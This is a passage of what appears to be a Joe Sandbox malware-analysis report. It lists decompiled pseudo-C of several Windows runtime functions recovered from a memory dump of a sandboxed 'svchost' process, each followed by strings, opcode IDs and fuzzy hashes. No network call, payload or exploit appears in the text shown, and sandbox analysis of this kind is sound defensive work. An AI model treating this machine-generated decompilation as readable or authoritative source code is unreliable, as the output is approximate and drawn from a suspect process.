                        						goto L5;
                        					}
                        				}
                        			}

                        Strings
                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0309BE0F
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                        • API String ID: 0-865735534
                        • Opcode ID: ee3a757cd6d2ebe9bae7fce8ffd2a07f2ce9ca6d03fed1e807fa8e064646def9
                        • Instruction ID: e637ab65275a7bfbfb8e4cc05d24b06e48337e7de1e46ed637827c5a5503f3bb
                        • Opcode Fuzzy Hash: ee3a757cd6d2ebe9bae7fce8ffd2a07f2ce9ca6d03fed1e807fa8e064646def9
                        • Instruction Fuzzy Hash: C8A1E375A03706CFEB65DB64C5507ABB7E9AF48720F08457AEC46DB680DB38D841CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 63%
                        			E03022D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                        				signed char _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				signed int _v52;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t55;
                        				signed int _t57;
                        				signed int _t58;
                        				char* _t62;
                        				signed char* _t63;
                        				signed char* _t64;
                        				signed int _t67;
                        				signed int _t72;
                        				signed int _t77;
                        				signed int _t78;
                        				signed int _t88;
                        				intOrPtr _t89;
                        				signed char _t93;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t102;
                        				signed int _t103;
                        				intOrPtr _t104;
                        				signed int _t105;
                        				signed int _t106;
                        				signed char _t109;
                        				signed int _t111;
                        				void* _t116;
                        
                        				_t102 = __edi;
                        				_t97 = __edx;
                        				_v12 = _v12 & 0x00000000;
                        				_t55 =  *[fs:0x18];
                        				_t109 = __ecx;
                        				_v8 = __edx;
                        				_t86 = 0;
                        				_v32 = _t55;
                        				_v24 = 0;
                        				_push(__edi);
                        				if(__ecx == 0x3115350) {
                        					_t86 = 1;
                        					_v24 = 1;
                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                        				}
                        				_t103 = _t102 | 0xffffffff;
                        				if( *0x3117bc8 != 0) {
                        					_push(0xc000004b);
                        					_push(_t103);
                        					E030697C0();
                        				}
                        				if( *0x31179c4 != 0) {
                        					_t57 = 0;
                        				} else {
                        					_t57 = 0x31179c8;
                        				}
                        				_v16 = _t57;
                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                        					_t93 = _t109;
                        					L23();
                        				}
                        				_t58 =  *_t109;
                        				if(_t58 == _t103) {
                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                        					_t58 = _t103;
                        					if(__eflags == 0) {
                        						_t93 = _t109;
                        						E03051624(_t86, __eflags);
                        						_t58 =  *_t109;
                        					}
                        				}
                        				_v20 = _v20 & 0x00000000;
                        				if(_t58 != _t103) {
                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                        				}
                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                        				_t88 = _v16;
                        				_v28 = _t104;
                        				L9:
                        				while(1) {
                        					if(E03047D50() != 0) {
                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                        					} else {
                        						_t62 = 0x7ffe0382;
                        					}
                        					if( *_t62 != 0) {
                        						_t63 =  *[fs:0x30];
                        						__eflags = _t63[0x240] & 0x00000002;
                        						if((_t63[0x240] & 0x00000002) != 0) {
                        							_t93 = _t109;
                        							E030BFE87(_t93);
                        						}
                        					}
                        					if(_t104 != 0xffffffff) {
                        						_push(_t88);
                        						_push(0);
                        						_push(_t104);
                        						_t64 = E03069520();
                        						goto L15;
                        					} else {
                        						while(1) {
                        							_t97 =  &_v8;
                        							_t64 = E0305E18B(_t109 + 4, _t97, 4, _t88, 0);
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t93 =  *(_t109 + 4);
                        							_v8 = _t93;
                        							if((_t93 & 0x00000002) != 0) {
                        								continue;
                        							}
                        							L15:
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t89 = _v24;
                        							if(_t64 < 0) {
                        								L0307DF30(_t93, _t97, _t64);
                        								_push(_t93);
                        								_t98 = _t97 | 0xffffffff;
                        								__eflags =  *0x3116901;
                        								_push(_t109);
                        								_v52 = _t98;
                        								if( *0x3116901 != 0) {
                        									_push(0);
                        									_push(1);
                        									_push(0);
                        									_push(0x100003);
                        									_push( &_v12);
                        									_t72 = E03069980();
                        									__eflags = _t72;
                        									if(_t72 < 0) {
                        										_v12 = _t98 | 0xffffffff;
                        									}
                        								}
                        								asm("lock cmpxchg [ecx], edx");
                        								_t111 = 0;
                        								__eflags = 0;
                        								if(0 != 0) {
                        									__eflags = _v12 - 0xffffffff;
                        									if(_v12 != 0xffffffff) {
                        										_push(_v12);
                        										E030695D0();
                        									}
                        								} else {
                        									_t111 = _v12;
                        								}
                        								return _t111;
                        							} else {
                        								if(_t89 != 0) {
                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                        									_t77 = E03047D50();
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										_t64 = 0x7ffe0384;
                        									} else {
                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                        									}
                        									__eflags =  *_t64;
                        									if( *_t64 != 0) {
                        										_t64 =  *[fs:0x30];
                        										__eflags = _t64[0x240] & 0x00000004;
                        										if((_t64[0x240] & 0x00000004) != 0) {
                        											_t78 = E03047D50();
                        											__eflags = _t78;
                        											if(_t78 == 0) {
                        												_t64 = 0x7ffe0385;
                        											} else {
                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                        											}
                        											__eflags =  *_t64 & 0x00000020;
                        											if(( *_t64 & 0x00000020) != 0) {
                        												_t64 = E030A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                        											}
                        										}
                        									}
                        								}
                        								return _t64;
                        							}
                        						}
                        						_t97 = _t88;
                        						_t93 = _t109;
                        						E030BFDDA(_t97, _v12);
                        						_t105 =  *_t109;
                        						_t67 = _v12 + 1;
                        						_v12 = _t67;
                        						__eflags = _t105 - 0xffffffff;
                        						if(_t105 == 0xffffffff) {
                        							_t106 = 0;
                        							__eflags = 0;
                        						} else {
                        							_t106 =  *(_t105 + 0x14);
                        						}
                        						__eflags = _t67 - 2;
                        						if(_t67 > 2) {
                        							__eflags = _t109 - 0x3115350;
                        							if(_t109 != 0x3115350) {
                        								__eflags = _t106 - _v20;
                        								if(__eflags == 0) {
                        									_t93 = _t109;
                        									E030BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                        								}
                        							}
                        						}
                        						_push("RTL: Re-Waiting\n");
                        						_push(0);
                        						_push(0x65);
                        						_v20 = _t106;
                        						E030B5720();
                        						_t104 = _v28;
                        						_t116 = _t116 + 0xc;
                        						continue;
                        					}
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Re-Waiting
                        • API String ID: 0-316354757
                        • Opcode ID: e761c7d2b26003495cfbe3e195fa3d3d26763ebea4bfaac8f47df699628fc8b2
                        • Instruction ID: a365cf3bc3a1ee87d013b32e18ffb6dccb8b680a2133e19609d87fdbf6302de2
                        • Opcode Fuzzy Hash: e761c7d2b26003495cfbe3e195fa3d3d26763ebea4bfaac8f47df699628fc8b2
                        • Instruction Fuzzy Hash: 8A613771E03655AFDB71DFA8C840BBEBBF9EB88710F180AA9D8119B2C0C7349940C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E030F0EA5(void* __ecx, void* __edx) {
                        				signed int _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				unsigned int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				char _v44;
                        				intOrPtr _v64;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t58;
                        				unsigned int _t60;
                        				intOrPtr _t62;
                        				char* _t67;
                        				char* _t69;
                        				void* _t80;
                        				void* _t83;
                        				intOrPtr _t93;
                        				intOrPtr _t115;
                        				char _t117;
                        				void* _t120;
                        
                        				_t83 = __edx;
                        				_t117 = 0;
                        				_t120 = __ecx;
                        				_v44 = 0;
                        				if(E030EFF69(__ecx,  &_v44,  &_v32) < 0) {
                        					L24:
                        					_t109 = _v44;
                        					if(_v44 != 0) {
                        						E030F1074(_t83, _t120, _t109, _t117, _t117);
                        					}
                        					L26:
                        					return _t117;
                        				}
                        				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                        				_t5 = _t83 + 1; // 0x1
                        				_v36 = _t5 << 0xc;
                        				_v40 = _t93;
                        				_t58 =  *(_t93 + 0xc) & 0x40000000;
                        				asm("sbb ebx, ebx");
                        				_t83 = ( ~_t58 & 0x0000003c) + 4;
                        				if(_t58 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t93);
                        					_push(0xffffffff);
                        					_t80 = E03069730();
                        					_t115 = _v64;
                        					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                        						_push(_t93);
                        						E030EA80D(_t115, 1, _v20, _t117);
                        						_t83 = 4;
                        					}
                        				}
                        				if(E030EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                        					goto L24;
                        				}
                        				_t60 = _v32;
                        				_t97 = (_t60 != 0x100000) + 1;
                        				_t83 = (_v44 -  *0x3118b04 >> 0x14) + (_v44 -  *0x3118b04 >> 0x14);
                        				_v28 = (_t60 != 0x100000) + 1;
                        				_t62 = _t83 + (_t60 >> 0x14) * 2;
                        				_v40 = _t62;
                        				if(_t83 >= _t62) {
                        					L10:
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					if(E03047D50() == 0) {
                        						_t67 = 0x7ffe0380;
                        					} else {
                        						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E030E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                        					}
                        					if(E03047D50() == 0) {
                        						_t69 = 0x7ffe0388;
                        					} else {
                        						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t69 != 0) {
                        						E030DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                        					}
                        					if(( *0x3118724 & 0x00000008) != 0) {
                        						E030E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                        					}
                        					_t117 = _v44;
                        					goto L26;
                        				}
                        				while(E030F15B5(0x3118ae4, _t83, _t97, _t97) >= 0) {
                        					_t97 = _v28;
                        					_t83 = _t83 + 2;
                        					if(_t83 < _v40) {
                        						continue;
                        					}
                        					goto L10;
                        				}
                        				goto L24;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 6ad4648bbd76fb0bc1f59150d9d2654adfba1c002ab94b1d8ec1844b70fc2cbd
                        • Instruction ID: b1eb2d9c6df34a0ea250134466686fd3caad37650b0226438aa91c20753136c3
                        • Opcode Fuzzy Hash: 6ad4648bbd76fb0bc1f59150d9d2654adfba1c002ab94b1d8ec1844b70fc2cbd
                        • Instruction Fuzzy Hash: A351C0713053419FD328DF29D984B5BB7E5EBC8704F08092CFA969BA91D771E809CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E0305F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				char* _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v44;
                        				char _v52;
                        				intOrPtr _v56;
                        				char _v60;
                        				intOrPtr _v72;
                        				void* _t51;
                        				void* _t58;
                        				signed short _t82;
                        				short _t84;
                        				signed int _t91;
                        				signed int _t100;
                        				signed short* _t103;
                        				void* _t108;
                        				intOrPtr* _t109;
                        
                        				_t103 = __ecx;
                        				_t82 = __edx;
                        				_t51 = E03044120(0, __ecx, 0,  &_v52, 0, 0, 0);
                        				if(_t51 >= 0) {
                        					_push(0x21);
                        					_push(3);
                        					_v56 =  *0x7ffe02dc;
                        					_v20 =  &_v52;
                        					_push( &_v44);
                        					_v28 = 0x18;
                        					_push( &_v28);
                        					_push(0x100020);
                        					_v24 = 0;
                        					_push( &_v60);
                        					_v16 = 0x40;
                        					_v12 = 0;
                        					_v8 = 0;
                        					_t58 = E03069830();
                        					_t87 =  *[fs:0x30];
                        					_t108 = _t58;
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                        					if(_t108 < 0) {
                        						L11:
                        						_t51 = _t108;
                        					} else {
                        						_push(4);
                        						_push(8);
                        						_push( &_v36);
                        						_push( &_v44);
                        						_push(_v60);
                        						_t108 = E03069990();
                        						if(_t108 < 0) {
                        							L10:
                        							_push(_v60);
                        							E030695D0();
                        							goto L11;
                        						} else {
                        							_t109 = L03044620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                        							if(_t109 == 0) {
                        								_t108 = 0xc0000017;
                        								goto L10;
                        							} else {
                        								_t21 = _t109 + 0x18; // 0x18
                        								 *((intOrPtr*)(_t109 + 4)) = _v60;
                        								 *_t109 = 1;
                        								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                        								 *(_t109 + 0xe) = _t82;
                        								 *((intOrPtr*)(_t109 + 8)) = _v56;
                        								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                        								E0306F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                        								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        								 *((short*)(_t109 + 0xc)) =  *_t103;
                        								_t91 =  *_t103 & 0x0000ffff;
                        								_t100 = _t91 & 0xfffffffe;
                        								_t84 = 0x5c;
                        								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                        									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                        										_push(_v60);
                        										E030695D0();
                        										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                        										_t51 = 0xc0000106;
                        									} else {
                        										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                        										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                        										goto L5;
                        									}
                        								} else {
                        									L5:
                        									 *_a4 = _t109;
                        									_t51 = 0;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t51;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction ID: fbefda3bcc0a5f04bed458621fc37a42c351e219aefad9340796a38778fb0c00
                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction Fuzzy Hash: 80519E755057119FD320DF19C840A6BBBF8FF88710F00892EF9959B690E7B4E904CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E030A3540(intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				char _v96;
                        				char _v352;
                        				char _v1072;
                        				intOrPtr _v1140;
                        				intOrPtr _v1148;
                        				char _v1152;
                        				char _v1156;
                        				char _v1160;
                        				char _v1164;
                        				char _v1168;
                        				char* _v1172;
                        				short _v1174;
                        				char _v1176;
                        				char _v1180;
                        				char _v1192;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				short _t41;
                        				short _t42;
                        				intOrPtr _t80;
                        				intOrPtr _t81;
                        				signed int _t82;
                        				void* _t83;
                        
                        				_v12 =  *0x311d360 ^ _t82;
                        				_t41 = 0x14;
                        				_v1176 = _t41;
                        				_t42 = 0x16;
                        				_v1174 = _t42;
                        				_v1164 = 0x100;
                        				_v1172 = L"BinaryHash";
                        				_t81 = E03060BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                        				if(_t81 < 0) {
                        					L11:
                        					_t75 = _t81;
                        					E030A3706(0, _t81, _t79, _t80);
                        					L12:
                        					if(_a4 != 0xc000047f) {
                        						E0306FA60( &_v1152, 0, 0x50);
                        						_v1152 = 0x60c201e;
                        						_v1148 = 1;
                        						_v1140 = E030A3540;
                        						E0306FA60( &_v1072, 0, 0x2cc);
                        						_push( &_v1072);
                        						E0307DDD0( &_v1072, _t75, _t79, _t80, _t81);
                        						E030B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                        						_push(_v1152);
                        						_push(0xffffffff);
                        						E030697C0();
                        					}
                        					return E0306B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                        				}
                        				_t79 =  &_v352;
                        				_t81 = E030A3971(0, _a4,  &_v352,  &_v1156);
                        				if(_t81 < 0) {
                        					goto L11;
                        				}
                        				_t75 = _v1156;
                        				_t79 =  &_v1160;
                        				_t81 = E030A3884(_v1156,  &_v1160,  &_v1168);
                        				if(_t81 >= 0) {
                        					_t80 = _v1160;
                        					E0306FA60( &_v96, 0, 0x50);
                        					_t83 = _t83 + 0xc;
                        					_push( &_v1180);
                        					_push(0x50);
                        					_push( &_v96);
                        					_push(2);
                        					_push( &_v1176);
                        					_push(_v1156);
                        					_t81 = E03069650();
                        					if(_t81 >= 0) {
                        						if(_v92 != 3 || _v88 == 0) {
                        							_t81 = 0xc000090b;
                        						}
                        						if(_t81 >= 0) {
                        							_t75 = _a4;
                        							_t79 =  &_v352;
                        							E030A3787(_a4,  &_v352, _t80);
                        						}
                        					}
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                        				}
                        				_push(_v1156);
                        				E030695D0();
                        				if(_t81 >= 0) {
                        					goto L12;
                        				} else {
                        					goto L11;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: BinaryHash
                        • API String ID: 2994545307-2202222882
                        • Opcode ID: bc6ca0be9c582b90d37e5154d5440ef5bb96d6a97059e7e775a13d46abdaab0e
                        • Instruction ID: 379e529fcddfea1df9c0c3cdb4b97e625c3d43e3a9ea44c30e15b441ace31d02
                        • Opcode Fuzzy Hash: bc6ca0be9c582b90d37e5154d5440ef5bb96d6a97059e7e775a13d46abdaab0e
                        • Instruction Fuzzy Hash: 3A4178F5D0162C9BDB21DA94DC81FDEB77CAB44714F0085E5E608AB240DB319E88CF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E030F05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v28;
                        				char _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				void* __ebx;
                        				void* _t35;
                        				signed int _t42;
                        				char* _t48;
                        				signed int _t59;
                        				signed char _t61;
                        				signed int* _t79;
                        				void* _t88;
                        
                        				_v28 = __edx;
                        				_t79 = __ecx;
                        				if(E030F07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                        					L13:
                        					_t35 = 0;
                        					L14:
                        					return _t35;
                        				}
                        				_t61 = __ecx[1];
                        				_t59 = __ecx[0xf];
                        				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                        				_v36 = _a8 << 0xc;
                        				_t42 =  *(_t59 + 0xc) & 0x40000000;
                        				asm("sbb esi, esi");
                        				_t88 = ( ~_t42 & 0x0000003c) + 4;
                        				if(_t42 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t59);
                        					_push(0xffffffff);
                        					if(E03069730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                        						_push(_t61);
                        						E030EA80D(_t59, 1, _v20, 0);
                        						_t88 = 4;
                        					}
                        				}
                        				_t35 = E030EA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                        				if(_t35 < 0) {
                        					goto L14;
                        				}
                        				E030F1293(_t79, _v40, E030F07DF(_t79, _v28,  &_a4,  &_a8, 1));
                        				if(E03047D50() == 0) {
                        					_t48 = 0x7ffe0380;
                        				} else {
                        					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        					E030E138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                        				}
                        				goto L13;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction ID: 3d5f3f8e6282ddef27daafa1280c9e1ec66d9e2d8faf5c44cad66b20a5d158af
                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction Fuzzy Hash: F631F132701345AFE720DE24CD84F9BB7D9ABC4754F084229FA58DBA81D770E904CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E030A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr* _v16;
                        				char* _v20;
                        				short _v22;
                        				char _v24;
                        				intOrPtr _t38;
                        				short _t40;
                        				short _t41;
                        				void* _t44;
                        				intOrPtr _t47;
                        				void* _t48;
                        
                        				_v16 = __edx;
                        				_t40 = 0x14;
                        				_v24 = _t40;
                        				_t41 = 0x16;
                        				_v22 = _t41;
                        				_t38 = 0;
                        				_v12 = __ecx;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(2);
                        				_t43 =  &_v24;
                        				_v20 = L"BinaryName";
                        				_push( &_v24);
                        				_push(__ecx);
                        				_t47 = 0;
                        				_t48 = E03069650();
                        				if(_t48 >= 0) {
                        					_t48 = 0xc000090b;
                        				}
                        				if(_t48 != 0xc0000023) {
                        					_t44 = 0;
                        					L13:
                        					if(_t48 < 0) {
                        						L16:
                        						if(_t47 != 0) {
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                        						}
                        						L18:
                        						return _t48;
                        					}
                        					 *_v16 = _t38;
                        					 *_a4 = _t47;
                        					goto L18;
                        				}
                        				_t47 = L03044620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				if(_t47 != 0) {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t47);
                        					_push(2);
                        					_push( &_v24);
                        					_push(_v12);
                        					_t48 = E03069650();
                        					if(_t48 < 0) {
                        						_t44 = 0;
                        						goto L16;
                        					}
                        					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                        						_t48 = 0xc000090b;
                        					}
                        					_t44 = 0;
                        					if(_t48 < 0) {
                        						goto L16;
                        					} else {
                        						_t17 = _t47 + 0xc; // 0xc
                        						_t38 = _t17;
                        						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                        							_t48 = 0xc000090b;
                        						}
                        						goto L13;
                        					}
                        				}
                        				_t48 = _t48 + 0xfffffff4;
                        				goto L18;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: BinaryName
                        • API String ID: 2994545307-215506332
                        • Opcode ID: 3e1981ada5b38658781296c198728de5dc3b7f093d5317352ed32ce031041d11
                        • Instruction ID: 32974f362d093bf4b4b9b864dc07eea1b24783086fe2ac181a5d2b3445939a2e
                        • Opcode Fuzzy Hash: 3e1981ada5b38658781296c198728de5dc3b7f093d5317352ed32ce031041d11
                        • Instruction Fuzzy Hash: B631087AD06A09AFDB15DA9CD945EAFF7B4EB80720F0541A9E914AB240D7319E04C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E0305D294(void* __ecx, char __edx, void* __eflags) {
                        				signed int _v8;
                        				char _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				intOrPtr _v64;
                        				char* _v68;
                        				intOrPtr _v72;
                        				char _v76;
                        				signed int _v84;
                        				intOrPtr _v88;
                        				char _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				char _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t35;
                        				char _t38;
                        				signed int _t40;
                        				signed int _t44;
                        				signed int _t52;
                        				void* _t53;
                        				void* _t55;
                        				void* _t61;
                        				intOrPtr _t62;
                        				void* _t64;
                        				signed int _t65;
                        				signed int _t66;
                        
                        				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x311d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                        				_v105 = __edx;
                        				_push( &_v92);
                        				_t52 = 0;
                        				_push(0);
                        				_push(0);
                        				_push( &_v104);
                        				_push(0);
                        				_t59 = __ecx;
                        				_t55 = 2;
                        				if(E03044120(_t55, __ecx) < 0) {
                        					_t35 = 0;
                        					L8:
                        					_pop(_t61);
                        					_pop(_t64);
                        					_pop(_t53);
                        					return E0306B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                        				}
                        				_v96 = _v100;
                        				_t38 = _v92;
                        				if(_t38 != 0) {
                        					_v104 = _t38;
                        					_v100 = _v88;
                        					_t40 = _v84;
                        				} else {
                        					_t40 = 0;
                        				}
                        				_v72 = _t40;
                        				_v68 =  &_v104;
                        				_push( &_v52);
                        				_v76 = 0x18;
                        				_push( &_v76);
                        				_v64 = 0x40;
                        				_v60 = _t52;
                        				_v56 = _t52;
